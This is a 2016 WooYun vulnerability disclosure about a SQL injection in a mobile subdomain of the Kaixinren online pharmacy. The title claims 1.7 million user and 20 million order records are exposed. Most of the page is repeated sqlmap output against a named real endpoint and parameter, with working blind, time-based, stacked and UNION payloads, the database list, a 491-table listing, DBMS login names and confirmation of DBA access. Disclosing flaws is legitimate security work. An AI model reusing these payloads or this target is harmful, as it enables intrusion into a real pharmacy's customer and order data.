当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193455

漏洞标题:开心人大药房某分站存在SQL注入(涉及170W用户数据/2000W订单数据)

相关厂商:开心人大药房

漏洞作者: Xenon

提交时间:2016-04-07 14:29

修复时间:2016-05-22 14:30

公开时间:2016-05-22 14:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

RT

漏洞证明:

注入点

http://m.360kxr.com/goods_getCateLog.do?symptomId=2


2.png


这是一部分用户数据

3.png


订单数量

4.png


用户数量
<code>sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[*] BlacklistSMS
[*] CallTel
[*] distribution
[*] kxinfo
[*] kxr_ad
[*] KXR_AD_ManageSystem
[*] Mall_APPSMS
[*] Mall_Master
[*] Mall_MobileMessage
[*] Mall_Slave
[*] master
[*] model
[*] msdb
[*] Statistics
[*] tempdb
[*] TextTagDB
[*] union_AppServer
[*] union_CoreServer
[*] union_StatServer
[*] UnionManage
[*] user_mobile
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[*] BlacklistSMS
[*] CallTel
[*] distribution
[*] kxinfo
[*] kxr_ad
[*] KXR_AD_ManageSystem
[*] Mall_APPSMS
[*] Mall_Master
[*] Mall_MobileMessage
[*] Mall_Slave
[*] master
[*] model
[*] msdb
[*] Statistics
[*] tempdb
[*] TextTagDB
[*] union_AppServer
[*] union_CoreServer
[*] union_StatServer
[*] UnionManage
[*] user_mobile
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current database: 'Mall_Master'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: Mall_master
[491 tables]
+----------------------------------------+
| ADLink |
| ADManage |
| ADs |
| ActionGroup |
| ActionInfo |
| AdminLog |
| AdminLoginRecord |
| AllTheme |
| AloneCouponAction |
| Answer |
| Ask |
| AutoConfirmOrder |
| BackgroundMenu |
| BarterNumber |
| CallTel |
| Card |
| CardApplication |
| CardCash |
| CardFreeze |
| CardLog |
| CardMobileIdentifyCode |
| CardRecharge |
| CardRefund |
| Channel |
| ChannelManage |
| ChannelModule |
| ChannelModuleIndex_Right |
| Chinesegrade |
| Collection |
| CommentLog |
| Configure |
| ConfirmThenCancelOrders |
| Coupon |
| CouponActivity |
| CouponChannel |
| CouponRule |
| CouponSetting |
| CouponZuHe |
| D99_Tmp |
| DataChangeNotifyInfo |
| DeliveryCostRules |
| DeliveryCostRules_918new |
| DeliveryCostRules_bak |
| DeliveryProductInfo |
| DisaseCategory |
| DisaseCategoryChild |
| DisaseCategoryProduct |
| DisaseHowDetail |
| DisaseHowDetailNoDrugs |
| DisaseHowTypes |
| DisaseHowTypesNoDrugs |
| DisaseProduct |
| Discussion |
| DiscussionType |
| DiseaseHow_Small_Detail |
| DiseaseHow_Small_Type |
| DoctorDisaseTypes |
| DoctorEvalutation |
| DoctorExpense |
| DoctorHotVedio |
| DoctorHotVedioType |
| DoctorInfo |
| DoctorPayment |
| DrugFactoryBand |
| ElectronRecipe |
| ErrorWords |
| ExtendedPayment |
| Extension |
| FinanceLog |
| FinanceRecord |
| FreeAskingDoctor |
| FreeDoctorInfo |
| FriendLink |
| FriendLinkApply |
| GConsulting |
| GeneralCompany |
| GenericProduct |
| GenericProductBranch |
| Gift |
| GiftProduct |
| GiftUnion |
| GroupBuy |
| HealthTripToday |
| HealthTripTodayPicture |
| HotRecommendLlist |
| Hot_Area_GenralCompany |
| Index_LouCeng_Images |
| Index_LouCeng_KeyWords |
| InpourRequest |
| IntegralBarter |
| IntegralLog |
| IntegralSetting |
| Invoice_records |
| JiFenTempLog |
| Job |
| LensColors |
| LensRelationCode |
| LevelInfo |
| LevelSet |
| LoginLog |
| LunboPicture |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| MobileCheckMessage |
| NewElectronRecipe |
| NewElectronRecipe_product |
| OnHourExpress |
| OneHourOrder |
| OneHourOrder_Send |
| OneHoureDeliveryArea |
| OrderCancelReason |
| OrderCancelRecord |
| OrderDelivery |
| OrderLog |
| OrderNoCollection |
| Order_Union |
| Pack |
| PartnersGrantRule |
| Pay_Type |
| PhoneOrder |
| PointsProduct |
| PresentInfo |
| PresentRule |
| PriceComplaint |
| ProductActivityArea |
| ProductCollection |
| ProductCollectionRelation |
| ProductDetail_Pic |
| ProductDisaseArea |
| ProductDisaseAreaPic |
| ProductRelated |
| ProductSuit |
| ProductTransCost |
| Product_Testreport |
| Product_TestreportRecommend |
| PromoPlan |
| PromoPlanLog |
| Qualitylevel |
| RandCode |
| RecomendSingleProduct |
| Reg_Arrt |
| Relation_STP |
| RoleAction |
| Roles |
| RushBuy |
| RushProduct |
| SearchKeyWord |
| SecondkillRule |
| SendSms |
| ServiceGroup |
| ShareLog |
| ShareStatistics |
| Sheet1$ |
| ShoppingCarRecommend |
| ShoppingCarRecommendType |
| SpecialtyInfo |
| SymPicture |
| Symptom |
| SymptomKeyW |
| TelephoneSet |
| ThemeType |
| TongYongMingHelp |
| UpdateNotice |
| UserAddrAndOneHoureArea |
| UserEmailBindLog |
| UserInRole |
| UserLevelLog |
| UserMoblieBindLog |
| User_Lottery |
| V_CardCash |
| V_ConfirmThenCancelOrders |
| V_ConsultationUser |
| V_ForXywyProduct |
| V_MainProduct |
| V_MainProduct2 |
| V_OrderCustatistics |
| V_OrderDelivery |
| V_OrderItems |
| V_OrderProduct |
| V_OrderProductDelivery |
| V_Orderstatistics |
| V_ProductAttr |
| V_ProductCollection |
| V_ProductComment |
| V_ProductDetail |
| V_ProductRelate |
| V_ProductRelated |
| V_ProductTestreport |
| V_ProductWeiht |
| V_ProductandType |
| V_RecommendSym |
| V_Sales |
| V_SendSmsOrder |
| V_SplitOrder |
| V_UnionOrder |
| V_UserAllProduct |
| V_XYWYOrder |
| V_deliveryinfo |
| Vote |
| VoteLog |
| WapCouponRuleInfo |
| WeiboContent |
| ZhuantiTRT |
| adminlist |
| article |
| article_class |
| attr_data |
| baidu2 |
| bingfeng |
| buy_record |
| city |
| city_bak |
| comd_list |
| comment_detail |
| comment_reply |
| comment_vote |
| complaint |
| computer_info |
| consultation |
| consultation_extension |
| consultation_vote |
| county |
| county_bak |
| county_bak_new |
| delivery_cost |
| delivery_methods |
| delivery_methods_918new |
| delivery_methods_bak |
| hotcomment_product |
| logistics_company |
| logistics_coverage |
| logistics_finance |
| lottery_draw |
| messagetype |
| new_product |
| orderPromotion |
| order_info |
| order_items |
| pangolin_test_table |
| pillbox |
| product |
| productImages |
| product_attr |
| product_brand |
| product_change |
| product_com |
| product_comment |
| product_log |
| product_searchrank |
| product_type |
| product_whole |
| prom_order_items_bak |
| prom_promoplanlog_bak |
| province |
| province_bak |
| purchase_requirement |
| receive_addr |
| recipe_management |
| resetpwd_info |
| shortmessage |
| split_order |
| sqlmapoutput |
| syncobj_0x3030334135323030 |
| syncobj_0x3037323632353642 |
| syncobj_0x3037363345454336 |
| syncobj_0x3038443838393332 |
| syncobj_0x3039383035374242 |
| syncobj_0x3042394538354630 |
| syncobj_0x3045373434303539 |
| syncobj_0x3045463942443034 |
| syncobj_0x3046354644423134 |
| syncobj_0x3046394344314238 |
| syncobj_0x3130464433343233 |
| syncobj_0x3131303145354645 |
| syncobj_0x3131313243424445 |
| syncobj_0x3132373437453837 |
| syncobj_0x3133323042314444 |
| syncobj_0x3134454434374530 |
| syncobj_0x3136424542324433 |
| syncobj_0x3137414643323142 |
| syncobj_0x3138453533463243 |
| syncobj_0x3141373444304131 |
| syncobj_0x3142394543354634 |
| syncobj_0x3143374438324237 |
| syncobj_0x3144373135443042 |
| syncobj_0x3144394134304536 |
| syncobj_0x3145303441324633 |
| syncobj_0x3146353246444142 |
| syncobj_0x3233313037443333 |
| syncobj_0x3235393339373832 |
| syncobj_0x3236464342373639 |
| syncobj_0x3237353738374337 |
| syncobj_0x3237413432424142 |
| syncobj_0x3238343230443137 |
| syncobj_0x3238464646333245 |
| syncobj_0x3241414531453237 |
| syncobj_0x3246334242373631 |
| syncobj_0x3246343445383930 |
| syncobj_0x3246384130333541 |
| syncobj_0x3332363139434132 |
| syncobj_0x3335363132423835 |
| syncobj_0x3336424232453133 |
| syncobj_0x3338384430354136 |
| syncobj_0x3341303834464445 |
| syncobj_0x3341313837334135 |
| syncobj_0x3343314639384432 |
| syncobj_0x3343444434443830 |
| syncobj_0x3344444138453946 |
| syncobj_0x3432463045433138 |
| syncobj_0x3434363142434434 |
| syncobj_0x3435454231353832 |
| syncobj_0x3436353246363536 |
| syncobj_0x3437304636323833 |
| syncobj_0x3437323038433038 |
| syncobj_0x3439433844364339 |
| syncobj_0x3441384644373643 |
| syncobj_0x3444444232393730 |
| syncobj_0x3446394343313045 |
| syncobj_0x3531363641393245 |
| syncobj_0x3532364432353338 |
| syncobj_0x3534444438454146 |
| syncobj_0x3534454143434537 |
| syncobj_0x3535394238373639 |
| syncobj_0x3544393034364236 |
| syncobj_0x3546353644413733 |
| syncobj_0x3630303743393839 |
| syncobj_0x3630434445313934 |
| syncobj_0x3630443346354433 |
| syncobj_0x3630443839333041 |
| syncobj_0x3635323143464233 |
| syncobj_0x3635353944334137 |
| syncobj_0x3635394336424333 |
| syncobj_0x3637373934324435 |
| syncobj_0x3637384133354630 |
| syncobj_0x3638434146424237 |
| syncobj_0x3638454632373846 |
| syncobj_0x3639433743464335 |
| syncobj_0x3641333343303946 |
| syncobj_0x3641333344384235 |
| syncobj_0x3642463134304144 |
| syncobj_0x3643444646303635 |
| syncobj_0x3645303742374637 |
| syncobj_0x3645333837424138 |
| syncobj_0x3645434234383038 |
| syncobj_0x3646393931434235 |
| syncobj_0x3731413635374438 |
| syncobj_0x3731424332313236 |
| syncobj_0x3732353743413142 |
| syncobj_0x3734303642463830 |
| syncobj_0x3734373544413031 |
| syncobj_0x3735354332313030 |
| syncobj_0x3735373336424330 |
| syncobj_0x3738463239433434 |
| syncobj_0x3741423030383534 |
| syncobj_0x3741464138423335 |
| syncobj_0x3742353834344446 |
| syncobj_0x3743324533413043 |
| syncobj_0x3743384643364235 |
| syncobj_0x3744444444374135 |
| syncobj_0x3746373033313832 |
| syncobj_0x3746424434333042 |
| syncobj_0x3830343441373145 |
| syncobj_0x3830433845443942 |
| syncobj_0x3830454138354344 |
| syncobj_0x3831413031323538 |
| syncobj_0x3833354534344139 |
| syncobj_0x3835424644443044 |
| syncobj_0x3836314138334636 |
| syncobj_0x3836374533384142 |
| syncobj_0x3838333930323935 |
| syncobj_0x3839383435443344 |
| syncobj_0x3841364331443639 |
| syncobj_0x3842434542414342 |
| syncobj_0x3844383130413639 |
| syncobj_0x3845423143354338 |
| syncobj_0x3845424244323435 |
| syncobj_0x3846313837344130 |
| syncobj_0x3930434336363933 |
| syncobj_0x3932344146363738 |
| syncobj_0x3934423536314330 |
| syncobj_0x3935414331354339 |
| syncobj_0x3935443138464241 |
| syncobj_0x3937303246394641 |
| syncobj_0x3937363345443239 |
| syncobj_0x3942353046383531 |
| syncobj_0x3942374232334435 |
| syncobj_0x3944313438383946 |
| syncobj_0x4134323433353743 |
| syncobj_0x4135343936314643 |
| syncobj_0x4136363934464530 |
| syncobj_0x4137363534323932 |
| syncobj_0x4137414541393344 |
| syncobj_0x4137464530383839 |
| syncobj_0x4138373835453943 |
| syncobj_0x4138414137454445 |
| syncobj_0x4138424138304636 |
| syncobj_0x4141414532343344 |
| syncobj_0x4141424446413739 |
| syncobj_0x4144423543304633 |
| syncobj_0x4230324144304143 |
| syncobj_0x4231323935323031 |
| syncobj_0x4232373136333932 |
| syncobj_0x4242353730454146 |
| syncobj_0x4245463746374538 |
| syncobj_0x4246303938453345 |
| syncobj_0x4246433533443344 |
| syncobj_0x4330364645394335 |
| syncobj_0x4330393746323646 |
| syncobj_0x4331423332354433 |
| syncobj_0x4332423139383033 |
| syncobj_0x4334343644424133 |
| syncobj_0x4336373931423236 |
| syncobj_0x4336384136334241 |
| syncobj_0x4337383632363346 |
| syncobj_0x4337454641303534 |
| syncobj_0x4339414132423436 |
| syncobj_0x4341354230423641 |
| syncobj_0x4341434239374543 |
| syncobj_0x4342324136353836 |
| syncobj_0x4342344437354133 |
| syncobj_0x4342373236354141 |
| syncobj_0x4343334445323237 |
| syncobj_0x4343393538333135 |
| syncobj_0x4344344345413238 |
| syncobj_0x4345313036463345 |
| syncobj_0x4346464444453136 |
| syncobj_0x4430363131443030 |
| syncobj_0x4433364243464246 |
| syncobj_0x4435304439324138 |
| syncobj_0x4436413234454646 |
| syncobj_0x4437344537414339 |
| syncobj_0x4438323632393430 |
| syncobj_0x4439393743373246 |
| syncobj_0x4444303733334634 |
| syncobj_0x4444353844444144 |
| syncobj_0x4445353342443841 |
| syncobj_0x4446444439463337 |
| syncobj_0x4536323041364642 |
| syncobj_0x4536334446324133 |
| syncobj_0x4536443830414435 |
| syncobj_0x4538373746303435 |
| syncobj_0x4538374433454331 |
| syncobj_0x4539383939303841 |
| syncobj_0x4541443838334244 |
| syncobj_0x4542363046374133 |
| syncobj_0x4542444444384544 |
| syncobj_0x4544353941443238 |
| syncobj_0x4544453031313331 |
| syncobj_0x4546414138334338 |
| syncobj_0x4630414633304446 |
| syncobj_0x4630463338364136 |
| syncobj_0x4632414630373944 |
| syncobj_0x4633373145433041 |
| syncobj_0x4637443236314137 |
| syncobj_0x4638394539413046 |
| syncobj_0x4638463930423443 |
| syncobj_0x4639303346354437 |
| syncobj_0x4639363236374139 |
| syncobj_0x4639394532384335 |
| syncobj_0x4639433336423637 |
| syncobj_0x4641334339383437 |
| syncobj_0x4643304544454131 |
| syncobj_0x4646463435374539 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| sysfile1 |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| systree |
| tuijianp |
| type_brand |
| user_info |
| user_pay |
| xywy_Match |
| zixunFrendLink |
| zixunIndexLunbo |
| zixunNewCategory |
| 查询 |
+----------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[*] BlacklistSMS
[*] CallTel
[*] distribution
[*] kxinfo
[*] kxr_ad
[*] KXR_AD_ManageSystem
[*] Mall_APPSMS
[*] Mall_Master
[*] Mall_MobileMessage
[*] Mall_Slave
[*] master
[*] model
[*] msdb
[*] Statistics
[*] tempdb
[*] TextTagDB
[*] union_AppServer
[*] union_CoreServer
[*] union_StatServer
[*] UnionManage
[*] user_mobile
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
database management system users [26]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ad_kaixinren
[*] ad_kxr
[*] baiduweigou_kaixinren
[*] calltel_kaixinren
[*] cps_kaixinren
[*] cpsweb_kaixinren
[*] distributor_admin
[*] esys_kaixinren
[*] huateng_kaixinren
[*] jifen_kaixinren
[*] jprice_kaixinren
[*] Mall_News_kaixinren
[*] os_kaixinren
[*] rxpay_kaixinren
[*] s2_kaixinren
[*] sa
[*] superadmin_kaixinren
[*] test
[*] tmall_sql
[*] union_kaixinren
[*] unionapp_kaixinren
[*] wap.manage_kaixinren
[*] wap_360kxr
[*] wuliuservice_kaixinren
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
